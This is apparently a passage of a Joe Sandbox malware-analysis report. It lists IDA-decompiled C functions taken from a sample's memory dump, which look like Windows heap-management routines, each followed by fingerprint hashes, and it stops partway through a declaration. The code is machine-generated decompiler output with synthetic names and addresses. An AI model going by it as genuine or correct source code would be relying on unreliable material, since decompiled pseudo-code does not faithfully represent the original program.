                            C-Code - Quality: 92%
                            			E017E2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
                            				char _v5;
                            				signed int _v12;
                            				signed int _v16;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t30;
                            				signed int _t35;
                            				unsigned int _t50;
                            				signed int _t52;
                            				signed int _t53;
                            				unsigned int _t58;
                            				signed int _t61;
                            				signed int _t63;
                            				signed int _t67;
                            				signed int _t69;
                            				intOrPtr _t75;
                            				signed int _t81;
                            				signed int _t87;
                            				void* _t88;
                            				signed int _t90;
                            				signed int _t93;
                            
                            				_t69 = __ecx;
                            				_t30 = _a4;
                            				_t90 = __edx;
                            				_t81 = __ecx;
                            				_v12 = __ecx;
                            				_t87 = _t30 - 8;
                            				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
                            					_t87 = _t87 - 8;
                            				}
                            				_t67 = 0;
                            				if(_t90 != 0) {
                            					L14:
                            					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
                            						_t75 = (( *_t87 ^  *0x1806110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
                            						 *_a12 = _t75;
                            						_t35 = _a8 & 0x00000001;
                            						_v16 = _t35;
                            						if(_t35 == 0) {
                            							E01732280(_t35, _t81);
                            							_t81 = _v12;
                            						}
                            						_v5 = 0xff;
                            						if(( *_t87 ^  *0x1806110 ^ _t87) < 0) {
                            							_t91 = _v12;
                            							_t88 = L017E241A(_v12, _t90, _t87, _a8,  &_v5);
                            							if(_v16 == _t67) {
                            								L0172FFB0(_t67, _t88, _t91);
                            							}
                            							if(_t88 != 0) {
                            								E017E3209(_t91, _t88, _a8);
                            							}
                            							_t67 = 1;
                            						} else {
                            							_push(_t75);
                            							_push(_t67);
                            							E017DA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
                            							if(_v16 == _t67) {
                            								L0172FFB0(_t67, _t87, _v12);
                            							}
                            						}
                            					} else {
                            						_push(_t69);
                            						_push(_t67);
                            						E017DA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
                            					}
                            					return _t67;
                            				}
                            				_t69 =  *0x1806110; // 0xad807883
                            				_t93 = _t87;
                            				_t50 = _t69 ^ _t87 ^  *_t87;
                            				if(_t50 >= 0) {
                            					_t52 = _t50 >> 0x00000010 & 0x00007fff;
                            					if(_t52 == 0) {
                            						L12:
                            						_t53 = _t67;
                            						L13:
                            						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
                            						goto L14;
                            					}
                            					_t93 = _t87 - (_t52 << 3);
                            					_t58 =  *_t93 ^ _t69 ^ _t93;
                            					if(_t58 < 0) {
                            						L10:
                            						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
                            						L11:
                            						_t53 = _t61 & 0x000000ff;
                            						goto L13;
                            					}
                            					_t63 = _t58 >> 0x00000010 & 0x00007fff;
                            					if(_t63 == 0) {
                            						goto L12;
                            					}
                            					_t93 = _t93 + _t63 * 0xfffffff8;
                            					goto L10;
                            				}
                            				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
                            				goto L11;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 367096bfe5389df2e8d804dc722d4031f769ad85d2ae9ff649ee0dc2072c98f5
                            • Instruction ID: 96e779ba0ed713b4798c0363c7355b3a9e99c98b6ed06fd68dafa5e59d4e3919
                            • Opcode Fuzzy Hash: 367096bfe5389df2e8d804dc722d4031f769ad85d2ae9ff649ee0dc2072c98f5
                            • Instruction Fuzzy Hash: 1F413973A105095BDB25CF6CC88897AF7EDFF4C620B108669E915CB286E674DD12C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E017DAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                            				intOrPtr _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed char _v20;
                            				intOrPtr _v24;
                            				char* _t37;
                            				void* _t47;
                            				signed char _t51;
                            				void* _t53;
                            				char _t55;
                            				intOrPtr _t57;
                            				signed char _t61;
                            				intOrPtr _t75;
                            				void* _t76;
                            				signed int _t81;
                            				intOrPtr _t82;
                            
                            				_t53 = __ecx;
                            				_t55 = 0;
                            				_v20 = _v20 & 0;
                            				_t75 = __edx;
                            				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                            				_v24 = __edx;
                            				_v12 = 0;
                            				if((_t81 & 0x01000000) != 0) {
                            					L5:
                            					if(_a8 != 0) {
                            						_t81 = _t81 | 0x00000008;
                            					}
                            					_t57 = E017DABF4(_t55 + _t75, _t81);
                            					_v8 = _t57;
                            					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                            						_t76 = 0;
                            						_v16 = _v16 & 0;
                            					} else {
                            						_t59 = _t53;
                            						_t76 = E017DAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                            						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                            							_t47 = L017DAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                            							_t61 = _v20;
                            							if(_t61 != 0) {
                            								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                            								if(E017BCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                            									L017377F0(_t53, 0, _t76);
                            									_t76 = 0;
                            								}
                            							}
                            						}
                            					}
                            					_t82 = _v8;
                            					L16:
                            					if(E01737D50() == 0) {
                            						_t37 = 0x7ffe0380;
                            					} else {
                            						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            					}
                            					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            						E017D131B(_t53, _t76, _t82, _v16);
                            					}
                            					return _t76;
                            				}
                            				_t51 =  *(__ecx + 0x20);
                            				_v20 = _t51;
                            				if(_t51 == 0) {
                            					goto L5;
                            				}
                            				_t81 = _t81 | 0x00000008;
                            				if(E017BCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                            					_t55 = _v12;
                            					goto L5;
                            				} else {
                            					_t82 = 0;
                            					_t76 = 0;
                            					_v16 = _v16 & 0;
                            					goto L16;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                            • Instruction ID: 55b022e0b1b4f18e58d84dabf72b7432a986279a0ef265d8d1b5c0fbe51237a0
                            • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                            • Instruction Fuzzy Hash: 5131D132B0024D6BEB158B69C849FAFFBBBFF85210F058469E905A7291DB74DE42C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E01728A0A(intOrPtr* __ecx, signed int __edx) {
                            				signed int _v8;
                            				char _v524;
                            				signed int _v528;
                            				void* _v532;
                            				char _v536;
                            				char _v540;
                            				char _v544;
                            				intOrPtr* _v548;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t44;
                            				void* _t46;
                            				void* _t48;
                            				signed int _t53;
                            				signed int _t55;
                            				intOrPtr* _t62;
                            				void* _t63;
                            				unsigned int _t75;
                            				signed int _t79;
                            				unsigned int _t81;
                            				unsigned int _t83;
                            				signed int _t84;
                            				void* _t87;
                            
                            				_t76 = __edx;
                            				_v8 =  *0x180d360 ^ _t84;
                            				_v536 = 0x200;
                            				_t79 = 0;
                            				_v548 = __edx;
                            				_v544 = 0;
                            				_t62 = __ecx;
                            				_v540 = 0;
                            				_v532 =  &_v524;
                            				if(__edx == 0 || __ecx == 0) {
                            					L6:
                            					return L0175B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                            				} else {
                            					_v528 = 0;
                            					E0172E9C0(1, __ecx, 0, 0,  &_v528);
                            					_t44 = _v528;
                            					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                            					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                            					_t46 = 0xa;
                            					_t87 = _t81 - _t46;
                            					if(_t87 > 0 || _t87 == 0) {
                            						 *_v548 = 0x16f1180;
                            						L5:
                            						_t79 = 1;
                            						goto L6;
                            					} else {
                            						_t48 = L01741DB5(_t62,  &_v532,  &_v536);
                            						_t76 = _v528;
                            						if(_t48 == 0) {
                            							L9:
                            							L01753C2A(_t81, _t76,  &_v544);
                            							 *_v548 = _v544;
                            							goto L5;
                            						}
                            						_t62 = _v532;
                            						if(_t62 != 0) {
                            							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                            							_t53 =  *_t62;
                            							_v528 = _t53;
                            							if(_t53 != 0) {
                            								_t63 = _t62 + 4;
                            								_t55 = _v528;
                            								do {
                            									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                            										if(E01728999(_t63,  &_v540) == 0) {
                            											_t55 = _v528;
                            										} else {
                            											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                            											_t55 = _v528;
                            											if(_t75 >= _t83) {
                            												_t83 = _t75;
                            											}
                            										}
                            									}
                            									_t63 = _t63 + 0x14;
                            									_t55 = _t55 - 1;
                            									_v528 = _t55;
                            								} while (_t55 != 0);
                            								_t62 = _v532;
                            							}
                            							if(_t62 !=  &_v524) {
                            								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                            							}
                            							_t76 = _t83 & 0x0000ffff;
                            							_t81 = _t83 >> 0x10;
                            						}
                            						goto L9;
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a152b4f0131721d4e28618758c40c47d1c422bfe405331a50fcc9cd88fc681d1
                            • Instruction ID: 6cd9ec282db7057eff166cb22f0dfa85276d472a70f5f6e222ae5e3fd032e3a0
                            • Opcode Fuzzy Hash: a152b4f0131721d4e28618758c40c47d1c422bfe405331a50fcc9cd88fc681d1
                            • Instruction Fuzzy Hash: AA41A1B1A0023C9BDB24CF19CC88AA9F7F4FB54300F1042EAD91997242EB719E81CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E017DFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                            				char _v8;
                            				signed int _v12;
                            				signed int _t29;
                            				char* _t32;
                            				char* _t43;
                            				signed int _t80;
                            				signed int* _t84;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t56 = __edx;
                            				_t84 = __ecx;
                            				_t80 = E017DFD4E(__ecx, __edx);
                            				_v12 = _t80;
                            				if(_t80 != 0) {
                            					_t29 =  *__ecx & _t80;
                            					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                            					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                            						E017E0A13(__ecx, _t80, 0, _a4);
                            						_t80 = 1;
                            						if(E01737D50() == 0) {
                            							_t32 = 0x7ffe0380;
                            						} else {
                            							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            						}
                            						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            							_push(3);
                            							L21:
                            							L017D1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                            						}
                            						goto L22;
                            					}
                            					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                            						_t80 = E017E2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                            						if(_t80 != 0) {
                            							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                            							_t77 = _v8;
                            							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                            								E017DC8F7(_t66, _t77, 0);
                            							}
                            						}
                            					} else {
                            						_t80 = E017DDBD2(__ecx[0xb], _t74, __edx, _a4);
                            					}
                            					if(E01737D50() == 0) {
                            						_t43 = 0x7ffe0380;
                            					} else {
                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            					}
                            					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                            						goto L22;
                            					} else {
                            						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                            						goto L21;
                            					}
                            				} else {
                            					_push(__ecx);
                            					_push(_t80);
                            					E017DA80D(__ecx[0xf], 9, __edx, _t80);
                            					L22:
                            					return _t80;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                            • Instruction ID: 1aa1d18b4704caebb32183a892d544bc02407e50b0873c98f84ed7e1be5ce597
                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                            • Instruction Fuzzy Hash: 4C3108323006496FD722976CC849F6AFBFAEBC9650F184198E9479B386DA74DC42C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E017E22AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed char _v16;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v36;
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t50;
                            				signed int _t53;
                            				signed char _t63;
                            				signed char _t71;
                            				signed char _t75;
                            				signed int _t77;
                            				unsigned int _t106;
                            				unsigned int* _t114;
                            				signed int _t117;
                            
                            				_v20 = _v20 & 0x00000000;
                            				_t117 = _a4;
                            				_t114 = __ecx;
                            				_v24 = __edx;
                            				E017E21E8(_t117, __edx,  &_v16,  &_v12);
                            				if(_v24 != 0 && (_v12 | _v8) != 0) {
                            					_t71 =  !_v8;
                            					_v16 =  !_v12 >> 8 >> 8;
                            					_t72 = _t71 >> 8;
                            					_t50 = _v16;
                            					_t20 = (_t50 >> 8) + 0x16fac00; // 0x6070708
                            					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x16fac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x16fac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x16fac00)) & 0x000000ff);
                            					_v16 = _t75;
                            					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
                            						L6:
                            						_t53 =  *0x1806110; // 0xad807883
                            						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
                            						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1806110 ^ _t117) & 0x000000ff | 0x00000200;
                            						_t77 = _a8 & 0x00000001;
                            						if(_t77 == 0) {
                            							L0172FFB0(_t77, _t114, _t114);
                            						}
                            						_t63 = L017E2FBD(_t114, _v24, _v12, _v8, _v16, 0);
                            						_v36 = 1;
                            						if(_t77 == 0) {
                            							E01732280(_t63, _t114);
                            						}
                            						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
                            						 *_a12 = 0xff;
                            					} else {
                            						_t106 =  *(__ecx + 0x18) >> 7;
                            						if(_t106 <= 8) {
                            							_t106 = 8;
                            						}
                            						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
                            							goto L6;
                            						}
                            					}
                            				}
                            				return _v20;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2073759e1d318e0c08e084e2f72b42f2bd0823289eaf1cea5bf0bfa314181af
                            • Instruction ID: be04d94f9d5c80931f4f410bb0e68e441a044f971b5d7fc5761c4d7508f7f88d
                            • Opcode Fuzzy Hash: d2073759e1d318e0c08e084e2f72b42f2bd0823289eaf1cea5bf0bfa314181af
                            • Instruction Fuzzy Hash: 294104711143424BC305DF28C8A9A7ABBE4EF89225F06465DF4D58B2D2CE34D819CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E017E20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t35;
                            				signed int _t57;
                            				unsigned int _t61;
                            				signed int _t63;
                            				signed int _t64;
                            				signed int _t73;
                            				signed int _t77;
                            				signed int _t80;
                            				signed int _t83;
                            				signed int _t84;
                            				unsigned int _t92;
                            				unsigned int _t97;
                            				signed int _t100;
                            				unsigned int _t102;
                            
                            				_t79 = __edx;
                            				_t35 =  *0x1806110; // 0xad807883
                            				_t57 = _a4;
                            				_v8 = __ecx;
                            				_t84 =  *_t57;
                            				_v12 = __edx;
                            				_t61 = _t84 ^ _t35 ^ _t57;
                            				_t83 = _t61 >> 0x00000001 & 0x00007fff;
                            				_v20 = _t83;
                            				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
                            				_t63 = _t61 >> 0x00000010 & 0x00007fff;
                            				if(_t63 != 0) {
                            					_t100 =  *0x1806110; // 0xad807883
                            					_t77 = _t57 - (_t63 << 3);
                            					_v16 = _t77;
                            					_t102 = _t100 ^ _t77 ^  *_t77;
                            					_t106 = _t102;
                            					if(_t102 >= 0) {
                            						L017E2E3F(_v8, __edx, _t106, _t77);
                            						_t57 = _v16;
                            						_t79 = _v12;
                            						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
                            					}
                            				}
                            				_t64 = _t57 + _t83 * 8;
                            				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
                            					asm("lfence");
                            					_t97 =  *_t64 ^  *0x1806110 ^ _t64;
                            					_t109 = _t97;
                            					if(_t97 >= 0) {
                            						L017E2E3F(_v8, _t79, _t109, _t64);
                            						_t79 = _v12;
                            						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
                            					}
                            				}
                            				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
                            					_t73 = _t57 + _t83 * 8;
                            					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
                            						asm("lfence");
                            						_t92 =  *_t73 ^  *0x1806110 ^ _t73;
                            						_t113 = _t92;
                            						if(_t92 >= 0) {
                            							L017E2E3F(_v8, _t79, _t113, _t73);
                            							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
                            						}
                            					}
                            				}
                            				if(_v20 != _t83) {
                            					_t66 = _v12;
                            					_t80 = _t57 + _t83 * 8;
                            					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1806110 ^ _t57) & 0x0000fffe;
                            					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
                            						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1806110 ^ _t80) & 0x7fff0000;
                            					}
                            				}
                            				 *_a8 = _t83;
                            				return _t57;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78b1f6af34ff6c11ba30086088327e4418139944abbc667c61e926eb2b410134
                            • Instruction ID: c48a9684b0961f8386ae5b857d2069f13b9b1e891656218e1087677604d05fa2
                            • Opcode Fuzzy Hash: 78b1f6af34ff6c11ba30086088327e4418139944abbc667c61e926eb2b410134
                            • Instruction Fuzzy Hash: B041B233E0042A8BCB18CF68C495579F7F6FB4C30576601BDD905AB286EB34AE51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E017E2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
                            				char _v5;
                            				signed char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int* _v24;
                            				signed int _t34;
                            				signed char _t40;
                            				signed int* _t49;
                            				signed int _t55;
                            				signed char _t57;
                            				signed char _t58;
                            				signed char _t59;
                            				signed short _t60;
                            				unsigned int _t66;
                            				unsigned int _t71;
                            				signed int _t77;
                            				signed char _t83;
                            				signed char _t84;
                            				signed int _t91;
                            				signed int _t93;
                            				signed int _t96;
                            
                            				_t34 = E017E21E8(_a4, __edx,  &_v24,  &_v20);
                            				_t83 =  !_v20;
                            				_t57 =  !_v16;
                            				_t84 = _t83 >> 8;
                            				_v12 = _t84 >> 8;
                            				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x16fac00));
                            				_t58 = _t57 >> 8;
                            				_t59 = _t58 >> 8;
                            				_t66 = _t59 >> 8;
                            				_t60 = _a4;
                            				_t13 = _t66 + 0x16fac00; // 0x6070708
                            				_t40 = _v12;
                            				_t71 = _t40 >> 8;
                            				_v12 = 0;
                            				_t17 = _t71 + 0x16fac00; // 0x6070708
                            				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x16fac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x16fac00)) + _v5 & 0x000000ff);
                            				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1806110 ^ _t34 ^ _t60) & 0x00000001;
                            				_t49 = __ecx + 8;
                            				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1806110 & 0x0000ffff;
                            				_t91 =  *_t49;
                            				_t96 = _t49[1] & 1;
                            				_v24 = _t49;
                            				if(_t91 != 0) {
                            					_t93 = _t77;
                            					L2:
                            					while(1) {
                            						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1806110 & 0x0000ffff)) {
                            							_t55 =  *_t91;
                            							if(_t96 == 0) {
                            								L11:
                            								if(_t55 == 0) {
                            									goto L13;
                            								} else {
                            									goto L12;
                            								}
                            							} else {
                            								if(_t55 == 0) {
                            									L13:
                            									_v12 = 0;
                            								} else {
                            									_t55 = _t55 ^ _t91;
                            									goto L11;
                            								}
                            							}
                            						} else {
                            							_t55 =  *(_t91 + 4);
                            							if(_t96 == 0) {
                            								L6:
                            								if(_t55 != 0) {
                            									L12:
                            									_t91 = _t55;
                            									continue;
                            								} else {
                            									goto L7;
                            								}
                            							} else {
                            								if(_t55 == 0) {
                            									L7:
                            									_v12 = 1;
                            								} else {
                            									_t55 = _t55 ^ _t91;
                            									goto L6;
                            								}
                            							}
                            						}
                            						goto L14;
                            					}
                            				}
                            				L14:
                            				_t29 = _t60 + 4; // 0x4
                            				return E0172B090(_v24, _t91, _v12, _t29);
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8560951dd31559a3f7e70677822f42f91c4d6a25984a2b257b44cc50e03bb605
                            • Instruction ID: b167a3a310e8e1d9c866a8693bfd2269e46a0c0bf85047ac7881bfc842d94d12
                            • Opcode Fuzzy Hash: 8560951dd31559a3f7e70677822f42f91c4d6a25984a2b257b44cc50e03bb605
                            • Instruction Fuzzy Hash: 104139715001654FC711CB69C89C6BABFF9EF8D201B0A81EAD885DB247DA34C956C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E017DEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                            				signed int _v8;
                            				char _v12;
                            				intOrPtr _v15;
                            				char _v16;
                            				intOrPtr _v19;
                            				void* _v28;
                            				intOrPtr _v36;
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t26;
                            				signed int _t27;
                            				char* _t40;
                            				unsigned int* _t50;
                            				intOrPtr* _t58;
                            				unsigned int _t59;
                            				char _t75;
                            				signed int _t86;
                            				intOrPtr _t88;
                            				intOrPtr* _t91;
                            
                            				_t75 = __edx;
                            				_t91 = __ecx;
                            				_v12 = __edx;
                            				_t50 = __ecx + 0x30;
                            				_t86 = _a4 & 0x00000001;
                            				if(_t86 == 0) {
                            					E01732280(_t26, _t50);
                            					_t75 = _v16;
                            				}
                            				_t58 = _t91;
                            				_t27 = E017DE815(_t58, _t75);
                            				_v8 = _t27;
                            				if(_t27 != 0) {
                            					E0171F900(_t91 + 0x34, _t27);
                            					if(_t86 == 0) {
                            						L0172FFB0(_t50, _t86, _t50);
                            					}
                            					_push( *((intOrPtr*)(_t91 + 4)));
                            					_push( *_t91);
                            					_t59 =  *(_v8 + 0x10);
                            					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                            					_push(0x8000);
                            					_t11 = _t53 - 1; // 0x0
                            					_t12 = _t53 - 1; // 0x0
                            					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                            					L017DAFDE( &_v12,  &_v16);
                            					asm("lock xadd [eax], ecx");
                            					asm("lock xadd [eax], ecx");
                            					L017DBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                            					_t55 = _v36;
                            					_t88 = _v36;
                            					if(E01737D50() == 0) {
                            						_t40 = 0x7ffe0388;
                            					} else {
                            						_t55 = _v19;
                            						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            					}
                            					if( *_t40 != 0) {
                            						L017CFE3F(_t55, _t91, _v15, _t55);
                            					}
                            				} else {
                            					if(_t86 == 0) {
                            						L0172FFB0(_t50, _t86, _t50);
                            						_t75 = _v16;
                            					}
                            					_push(_t58);
                            					_t88 = 0;
                            					_push(0);
                            					E017DA80D(_t91, 8, _t75, 0);
                            				}
                            				return _t88;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                            • Instruction ID: 36842923efa72c9518d1be714048e33361c58d74dd887b2390f1b7b2c3da26b5
                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                            • Instruction Fuzzy Hash: 5631A37260470A9BC71ADF28C884E6BF7BAFBC4610F04492DF5968B645DE30E905CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E017969A6(signed short* __ecx, void* __eflags) {
                            				signed int _v8;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				signed int _v24;
                            				signed short _v28;
                            				signed int _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				char* _v44;
                            				signed int _v48;
                            				intOrPtr _v52;
                            				signed int _v56;
                            				char _v60;
                            				signed int _v64;
                            				char _v68;
                            				char _v72;
                            				signed short* _v76;
                            				signed int _v80;
                            				char _v84;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t68;
                            				intOrPtr _t73;
                            				signed short* _t74;
                            				void* _t77;
